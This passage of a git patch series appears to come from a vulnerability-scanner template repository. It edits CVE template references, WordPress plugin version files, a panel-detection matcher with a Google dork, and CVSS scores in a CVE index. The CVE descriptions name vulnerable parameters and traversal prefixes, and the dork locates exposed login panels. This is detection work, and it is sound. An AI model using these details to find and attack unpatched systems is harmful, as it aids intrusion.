attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php. reference: - https://www.exploit-db.com/exploits/9564 - - https://www.cvedetails.com/cve/CVE-2009-3053 - https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964 - https://nvd.nist.gov/vuln/detail/CVE-2009-3053 diff --git a/cves/2009/CVE-2009-3318.yaml b/cves/2009/CVE-2009-3318.yaml index fe8a9f6991..3b39d07580 100644 --- a/cves/2009/CVE-2009-3318.yaml +++ b/cves/2009/CVE-2009-3318.yaml @@ -7,7 +7,6 @@ info: description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. reference: - https://www.exploit-db.com/exploits/9706 - - https://www.cvedetails.com/cve/CVE-2009-3318 - https://nvd.nist.gov/vuln/detail/CVE-2009-3318 - https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/ classification: diff --git a/cves/2009/CVE-2009-4679.yaml b/cves/2009/CVE-2009-4679.yaml index 5b3eddb5f0..e247929adb 100644 --- a/cves/2009/CVE-2009-4679.yaml +++ b/cves/2009/CVE-2009-4679.yaml @@ -8,7 +8,6 @@ info: Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/33440 - - https://www.cvedetails.com/cve/CVE-2009-4679 - https://nvd.nist.gov/vuln/detail/CVE-2009-4679 - http://web.archive.org/web/20140722130146/http://secunia.com/advisories/37760/ classification: diff --git a/cves/2015/CVE-2015-7780.yaml b/cves/2015/CVE-2015-7780.yaml index 5286df5caf..7eac0cb917 100644 --- a/cves/2015/CVE-2015-7780.yaml +++ b/cves/2015/CVE-2015-7780.yaml @@ -7,7 +7,6 @@ info: description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/35933 - - https://www.cvedetails.com/cve/CVE-2015-7780/ - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html - http://jvn.jp/en/jp/JVN21968837/index.html - https://nvd.nist.gov/vuln/detail/CVE-2015-7780 diff --git a/cves/2017/CVE-2017-1000163.yaml b/cves/2017/CVE-2017-1000163.yaml index fe1fc3dfb2..ad326b00c3 100644 --- a/cves/2017/CVE-2017-1000163.yaml +++ b/cves/2017/CVE-2017-1000163.yaml @@ -7,7 +7,6 @@ info: description: Phoenix Framework versions 1.0.0 through 1.0.4, 1.1.0 through 1.1.6, 1.2.0, 1.2.2 and 1.3.0-rc.0 contain an open redirect vulnerability, which may result in phishing or social engineering attacks. reference: - https://elixirforum.com/t/security-releases-for-phoenix/4143 - - https://www.cvedetails.com/cve/CVE-2017-1000163 - https://vuldb.com/?id.109587 - https://nvd.nist.gov/vuln/detail/CVE-2017-1000163 classification: diff --git a/cves/2017/CVE-2017-12138.yaml b/cves/2017/CVE-2017-12138.yaml index 924d872ac1..42d820bac8 100644 --- a/cves/2017/CVE-2017-12138.yaml +++ b/cves/2017/CVE-2017-12138.yaml @@ -8,7 +8,6 @@ info: reference: - https://github.com/XOOPS/XoopsCore25/issues/523 - https://xoops.org - - https://www.cvedetails.com/cve/CVE-2017-12138 - https://nvd.nist.gov/vuln/detail/CVE-2017-12138 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N diff --git a/cves/2017/CVE-2017-15363.yaml b/cves/2017/CVE-2017-15363.yaml index 796d80f4f2..3e86aeddbc 100644 --- a/cves/2017/CVE-2017-15363.yaml +++ b/cves/2017/CVE-2017-15363.yaml @@ -7,7 +7,6 @@ info: description: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter. reference: - https://www.exploit-db.com/exploits/42985 - - https://www.cvedetails.com/cve/CVE-2017-15363 - https://extensions.typo3.org/extension/restler/ - https://extensions.typo3.org/extension/download/restler/1.7.1/zip/ - https://nvd.nist.gov/vuln/detail/CVE-2017-15363 diff --git a/cves/2017/CVE-2017-15647.yaml b/cves/2017/CVE-2017-15647.yaml index c996105f8a..a4051356a4 100644 --- a/cves/2017/CVE-2017-15647.yaml +++ b/cves/2017/CVE-2017-15647.yaml @@ -7,7 +7,6 @@ info: description: FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. reference: - https://www.exploit-db.com/exploits/44054 - - https://www.cvedetails.com/cve/CVE-2017-15647 - https://blogs.securiteam.com/index.php/archives/3472 - https://nvd.nist.gov/vuln/detail/CVE-2017-15647 classification: diff --git a/cves/2017/CVE-2017-5521.yaml b/cves/2017/CVE-2017-5521.yaml index f14e526070..f0c414c4fd 100644 --- a/cves/2017/CVE-2017-5521.yaml +++ b/cves/2017/CVE-2017-5521.yaml @@ -11,7 +11,6 @@ info: - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability - http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5521 - - https://www.cvedetails.com/cve/CVE-2017-5521/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 diff --git a/cves/2018/CVE-2018-17422.yaml b/cves/2018/CVE-2018-17422.yaml index c2e00f77b6..f47fdcac5b 100644 --- a/cves/2018/CVE-2018-17422.yaml +++ b/cves/2018/CVE-2018-17422.yaml @@ -8,7 +8,6 @@ info: dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://github.com/dotCMS/core/issues/15286 - - https://www.cvedetails.com/cve/CVE-2018-17422 - https://nvd.nist.gov/vuln/detail/CVE-2018-17422 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N diff --git a/cves/2018/CVE-2018-6200.yaml b/cves/2018/CVE-2018-6200.yaml index 289dfa7e87..523bd8921e 100644 --- a/cves/2018/CVE-2018-6200.yaml +++ b/cves/2018/CVE-2018-6200.yaml @@ -8,7 +8,6 @@ info: vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://cxsecurity.com/issue/WLB-2018010251 - - https://www.cvedetails.com/cve/CVE-2018-6200 - https://nvd.nist.gov/vuln/detail/CVE-2018-6200 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N diff --git a/cves/2018/CVE-2018-7719.yaml b/cves/2018/CVE-2018-7719.yaml index 0736b1deec..7129e1594a 100644 --- a/cves/2018/CVE-2018-7719.yaml +++ b/cves/2018/CVE-2018-7719.yaml @@ -8,7 +8,6 @@ info: Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/146911/Acrolinx-Server-Directory-Traversal.html - - https://www.cvedetails.com/cve/CVE-2018-7719 - https://support.acrolinx.com/hc/en-us/articles/213987685-Acrolinx-Server-Version-5-1-including-subsequent-service-releases- - https://www.exploit-db.com/exploits/44345/ - https://nvd.nist.gov/vuln/detail/CVE-2018-7719 diff --git a/cves/2019/CVE-2019-3912.yaml b/cves/2019/CVE-2019-3912.yaml index 080ab85add..b789188d97 100644 --- a/cves/2019/CVE-2019-3912.yaml +++ b/cves/2019/CVE-2019-3912.yaml @@ -7,7 +7,6 @@ info: description: LabKey Server Community Edition before 18.3.0-61806.763 contains an open redirect vulnerability via the /__r1/ returnURL parameter, which allows an attacker to redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://www.tenable.com/security/research/tra-2019-03 - - https://www.cvedetails.com/cve/CVE-2019-3912 - https://nvd.nist.gov/vuln/detail/CVE-2019-3912 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N diff --git a/cves/2019/CVE-2019-9915.yaml b/cves/2019/CVE-2019-9915.yaml index 0a46dc948d..4dadb5f8cc 100644 --- a/cves/2019/CVE-2019-9915.yaml +++ b/cves/2019/CVE-2019-9915.yaml @@ -8,7 +8,6 @@ info: reference: - https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms - https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300 - - https://www.cvedetails.com/cve/CVE-2019-9915 - https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/ - https://nvd.nist.gov/vuln/detail/CVE-2019-9915 classification: diff --git a/cves/2019/CVE-2019-9922.yaml b/cves/2019/CVE-2019-9922.yaml index c208b08749..886303742c 100644 --- a/cves/2019/CVE-2019-9922.yaml +++ b/cves/2019/CVE-2019-9922.yaml @@ -7,7 +7,6 @@ info: description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files. reference: - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md - - https://www.cvedetails.com/cve/CVE-2019-9922 - https://extensions.joomla.org/extension/je-messenger/ - https://nvd.nist.gov/vuln/detail/CVE-2019-9922 classification: diff --git a/cves/2020/CVE-2020-11455.yaml b/cves/2020/CVE-2020-11455.yaml index 3144ec60f6..ccc23e1221 100644 --- a/cves/2020/CVE-2020-11455.yaml +++ b/cves/2020/CVE-2020-11455.yaml @@ -7,7 +7,6 @@ info: description: LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. reference: - https://www.exploit-db.com/exploits/48297 - - https://www.cvedetails.com/cve/CVE-2020-11455 - https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b - http://packetstormsecurity.com/files/157112/LimeSurvey-4.1.11-Path-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2020-11455 diff --git a/cves/2020/CVE-2020-11529.yaml b/cves/2020/CVE-2020-11529.yaml index c4fcacdf4f..191f707a48 100644 --- a/cves/2020/CVE-2020-11529.yaml +++ b/cves/2020/CVE-2020-11529.yaml @@ -7,7 +7,6 @@ info: description: Grav before 1.7 has an open redirect vulnerability via common/Grav.php. This is partially fixed in 1.6.23 and still present in 1.6.x. reference: - https://github.com/getgrav/grav/issues/3134 - - https://www.cvedetails.com/cve/CVE-2020-11529 - https://nvd.nist.gov/vuln/detail/CVE-2020-11529 - https://github.com/getgrav/grav/commit/2eae104c7a4bf32bc26cb8073d5c40464bfda3f7 classification: diff --git a/cves/2020/CVE-2020-13121.yaml b/cves/2020/CVE-2020-13121.yaml index 08e8f14bfd..fb9d5b9c19 100644 --- a/cves/2020/CVE-2020-13121.yaml +++ b/cves/2020/CVE-2020-13121.yaml @@ -7,7 +7,6 @@ info: description: Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://github.com/Submitty/Submitty/issues/5265 - - https://www.cvedetails.com/cve/CVE-2020-13121 - https://nvd.nist.gov/vuln/detail/CVE-2020-13121 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N diff --git a/cves/2020/CVE-2020-18268.yaml b/cves/2020/CVE-2020-18268.yaml index 52b839a8e7..70eeb61c87 100644 --- a/cves/2020/CVE-2020-18268.yaml +++ b/cves/2020/CVE-2020-18268.yaml @@ -7,7 +7,6 @@ info: description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://github.com/zblogcn/zblogphp/issues/216 - - https://www.cvedetails.com/cve/CVE-2020-18268 - https://github.com/zblogcn/zblogphp/issues/209 - https://nvd.nist.gov/vuln/detail/CVE-2020-18268 classification: diff --git a/cves/2020/CVE-2020-23015.yaml b/cves/2020/CVE-2020-23015.yaml index 646db73c62..44dfc2fe7b 100644 --- a/cves/2020/CVE-2020-23015.yaml +++ b/cves/2020/CVE-2020-23015.yaml @@ -7,7 +7,6 @@ info: description: OPNsense through 20.1.5 contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://github.com/opnsense/core/issues/4061 - - https://www.cvedetails.com/cve/CVE-2020-23015 - https://nvd.nist.gov/vuln/detail/CVE-2020-23015 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N diff --git a/cves/2020/CVE-2020-36365.yaml b/cves/2020/CVE-2020-36365.yaml index b9ba68b772..68ac9a80af 100644 --- a/cves/2020/CVE-2020-36365.yaml +++ b/cves/2020/CVE-2020-36365.yaml @@ -7,7 +7,6 @@ info: description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://github.com/smartstore/SmartStoreNET/issues/2113 - - https://www.cvedetails.com/cve/CVE-2020-36365 - https://github.com/smartstore/SmartStoreNET - https://nvd.nist.gov/vuln/detail/CVE-2020-36365 classification: diff --git a/cves/2022/CVE-2022-26233.yaml b/cves/2022/CVE-2022-26233.yaml index 85601b85f3..3fa45df94d 100644 --- a/cves/2022/CVE-2022-26233.yaml +++ b/cves/2022/CVE-2022-26233.yaml @@ -7,7 +7,6 @@ info: description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. reference: - https://0day.today/exploit/37579 - - https://www.cvedetails.com/cve/CVE-2022-26233 - http://seclists.org/fulldisclosure/2022/Apr/0 - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2022-26233 From 776dd28fb957f7ca70b771a0c80ecc41d382f60d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 Mar 2023 04:29:39 +0000 Subject: [PATCH 60/84] Auto WordPress Plugins Update [Fri Mar 3 04:29:39 UTC 2023] :robot: --- helpers/wordpress/plugins/all-in-one-seo-pack.txt | 2 +- helpers/wordpress/plugins/facebook-for-woocommerce.txt | 2 +- helpers/wordpress/plugins/limit-login-attempts-reloaded.txt | 2 +- helpers/wordpress/plugins/webp-converter-for-media.txt | 2 +- helpers/wordpress/plugins/wordpress-seo.txt | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt index dffe6afad5..7e961f9e14 100644 --- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt +++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt @@ -1 +1 @@ -4.3.1.1 \ No newline at end of file +4.3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/facebook-for-woocommerce.txt b/helpers/wordpress/plugins/facebook-for-woocommerce.txt index 9c25f93c64..513cc0b6cf 100644 --- a/helpers/wordpress/plugins/facebook-for-woocommerce.txt +++ b/helpers/wordpress/plugins/facebook-for-woocommerce.txt @@ -1 +1 @@ -3.0.13 \ No newline at end of file +3.0.14 \ No newline at end of file diff --git a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt index b032fd7d32..3f1b61dd3e 100644 --- a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt +++ b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt @@ -1 +1 @@ -2.25.12 \ No newline at end of file +2.25.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index 885bc9f72d..182ea559ba 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.8.1 \ No newline at end of file +5.8.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordpress-seo.txt b/helpers/wordpress/plugins/wordpress-seo.txt index 00f29d8a93..f32c8fc2a7 100644 --- a/helpers/wordpress/plugins/wordpress-seo.txt +++ b/helpers/wordpress/plugins/wordpress-seo.txt @@ -1 +1 @@ -20.2 \ No newline at end of file +20.2.1 \ No newline at end of file From 3a7fb407135e9fc5d1535662c5fe78c52f3a9b59 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 3 Mar 2023 14:15:20 +0530 Subject: [PATCH 61/84] updated matchers --- exposed-panels/axway-securetransport-webclient.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/exposed-panels/axway-securetransport-webclient.yaml b/exposed-panels/axway-securetransport-webclient.yaml index 285c9d129a..daca060cd0 100644 --- a/exposed-panels/axway-securetransport-webclient.yaml +++ b/exposed-panels/axway-securetransport-webclient.yaml @@ -7,7 +7,7 @@ info: description: AXWAY Secure Transport Web Client panel was detected. reference: - https://www.axway.com/en/products/managed-file-transfer/securetransport - tags: panel,axway,securetransport + tags: panel,axway,securetransport,webclient requests: - method: GET @@ -19,8 +19,7 @@ requests: - type: word part: body words: - - "ST Web Client" - condition: and + - 'header": "ST Web Client' - type: status status: From cff12ed0e7186deb8030e85ca81c889ab8cfb81d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 3 Mar 2023 14:16:31 +0530 Subject: [PATCH 62/84] added metadata --- exposed-panels/axway-securetransport-webclient.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposed-panels/axway-securetransport-webclient.yaml b/exposed-panels/axway-securetransport-webclient.yaml index daca060cd0..0bb313af86 100644 --- a/exposed-panels/axway-securetransport-webclient.yaml +++ b/exposed-panels/axway-securetransport-webclient.yaml @@ -7,6 +7,9 @@ info: description: AXWAY Secure Transport Web Client panel was detected. reference: - https://www.axway.com/en/products/managed-file-transfer/securetransport + metadata: + verified: true + google-dork: intitle:"ST Web Client" tags: panel,axway,securetransport,webclient requests: From 0833b7369119c98b724249a7665c49b2db3c9609 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 Mar 2023 11:05:12 +0000 Subject: [PATCH 63/84] Auto Generated New Template Addition List [Fri Mar 3 11:05:12 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 958ae5d1c9..b9ea1528f5 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ cves/2022/CVE-2022-48165.yaml exposed-panels/axway-securetransport-panel.yaml +exposed-panels/axway-securetransport-webclient.yaml exposed-panels/kubeview-dashboard.yaml technologies/nimplant-c2.yaml technologies/wordpress/plugins/wpvivid-backuprestore.yaml From 29e39b665f96759e6ca1dec29de23d4221604a81 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 Mar 2023 11:49:52 +0000 Subject: [PATCH 65/84] Auto Generated cves.json [Fri Mar 3 11:49:52 UTC 2023] :robot: --- cves.json | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves.json b/cves.json index 89385b2a46..d503d43662 100644 --- a/cves.json +++ b/cves.json @@ -1557,7 +1557,7 @@ {"ID":"CVE-2022-38817","Info":{"Name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","Severity":"high","Description":"Dapr Dashboard 0.1.0 through 0.10.0 is susceptible to improper access control. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-38817.yaml"} {"ID":"CVE-2022-38870","Info":{"Name":"Free5gc 3.2.1 - Information Disclosure","Severity":"high","Description":"Free5gc 3.2.1 is susceptible to information disclosure. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-38870.yaml"} {"ID":"CVE-2022-39195","Info":{"Name":"LISTSERV 17 - Cross-Site Scripting","Severity":"medium","Description":"LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the \"c\" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-39195.yaml"} -{"ID":"CVE-2022-39952","Info":{"Name":"FortiNAC Unauthenticated Arbitrary File Write","Severity":"critical","Description":"A external control of file name or path in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2022/CVE-2022-39952.yaml"} +{"ID":"CVE-2022-39952","Info":{"Name":"FortiNAC Unauthenticated Arbitrary File Write","Severity":"critical","Description":"A external control of file name or path in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-39952.yaml"} {"ID":"CVE-2022-39960","Info":{"Name":"Atlassian Jira addon Netic Group Export \u003c 1.0.3 - Unauthenticated Access","Severity":"medium","Description":"The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-39960.yaml"} {"ID":"CVE-2022-40083","Info":{"Name":"Labstack Echo 4.8.0 - Open Redirect","Severity":"critical","Description":"Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"cves/2022/CVE-2022-40083.yaml"} {"ID":"CVE-2022-40359","Info":{"Name":"Kae's File Manager \u003c=1.4.7 - Cross-Site Scripting","Severity":"medium","Description":"Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-40359.yaml"} @@ -1589,10 +1589,10 @@ {"ID":"CVE-2022-47945","Info":{"Name":"Thinkphp Lang - Local File Inclusion","Severity":"critical","Description":"ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47945.yaml"} {"ID":"CVE-2022-47966","Info":{"Name":"ManageEngine - Remote Command Execution","Severity":"critical","Description":"Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47966.yaml"} {"ID":"CVE-2022-47986","Info":{"Name":"Pre-Auth RCE in Aspera Faspex","Severity":"critical","Description":"IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47986.yaml"} -{"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Configuration Exposure","Severity":"high","Description":"An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN530H4 M30H4.V5030.210121 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2022/CVE-2022-48165.yaml"} +{"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Configuration Exposure","Severity":"high","Description":"An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN530H4 M30H4.V5030.210121 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-48165.yaml"} {"ID":"CVE-2023-0669","Info":{"Name":"GoAnywhere MFT - Remote Code Execution (ZeroDay)","Severity":"high","Description":"Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2023/CVE-2023-0669.yaml"} {"ID":"CVE-2023-23488","Info":{"Name":"Paid Memberships Pro \u003c 2.9.8 - Unauthenticated Blind SQLi","Severity":"critical","Description":"The Paid Memberships Pro WordPress Plugin, version \u003c 2.9.8, is affected by an unauthenticated SQL injection vulnerability in the 'code' parameter of the '/pmpro/v1/order' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2023/CVE-2023-23488.yaml"} {"ID":"CVE-2023-23489","Info":{"Name":"Easy Digital Downloads 3.1.0.2 \u0026 3.1.0.3 - Unauthenticated SQLi","Severity":"critical","Description":"The Easy Digital Downloads WordPress Plugin, versions 3.1.0.2 \u0026 3.1.0.3, is affected by an unauthenticated SQL injection vulnerability in the 's' parameter of its 'edd_download_search' action.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2023/CVE-2023-23489.yaml"} -{"ID":"CVE-2023-23752","Info":{"Name":"Joomla Improper AccessCheck in WebService Endpoint","Severity":"high","Description":"An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2023/CVE-2023-23752.yaml"} +{"ID":"CVE-2023-23752","Info":{"Name":"Joomla Improper AccessCheck in WebService Endpoint","Severity":"medium","Description":"An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2023/CVE-2023-23752.yaml"} {"ID":"CVE-2023-24044","Info":{"Name":"Plesk Obsidian - Host Header Injection","Severity":"medium","Description":"A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2023/CVE-2023-24044.yaml"} {"ID":"CVE-2023-24322","Info":{"Name":"mojoPortal - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in the FileDialog.aspx component of mojoPortal v2.7.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2023/CVE-2023-24322.yaml"} From 21daac6d741bcf380262fd190af8236337aa019b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 Mar 2023 12:01:33 +0000 Subject: [PATCH 67/84] Auto Generated New Template Addition List [Fri Mar 3 12:01:32 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b9ea1528f5..45e1a591ac 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ cves/2022/CVE-2022-48165.yaml exposed-panels/axway-securetransport-panel.yaml exposed-panels/axway-securetransport-webclient.yaml +exposed-panels/gnu-mailman.yaml exposed-panels/kubeview-dashboard.yaml technologies/nimplant-c2.yaml technologies/wordpress/plugins/wpvivid-backuprestore.yaml From cf0e050cc5d6ebb00a032ab408c72fb0c985f1a3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 Mar 2023 12:09:16 +0000 Subject: [PATCH 68/84] Auto Generated CVE annotations [Fri Mar 3 12:09:16 UTC 2023] :robot: --- cves/2021/CVE-2021-32853.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-32853.yaml b/cves/2021/CVE-2021-32853.yaml index 9d7ce2426e..b30a3de2b7 100644 --- a/cves/2021/CVE-2021-32853.yaml +++ b/cves/2021/CVE-2021-32853.yaml @@ -3,7 +3,7 @@ id: CVE-2021-32853 info: name: Erxes <0.23.0 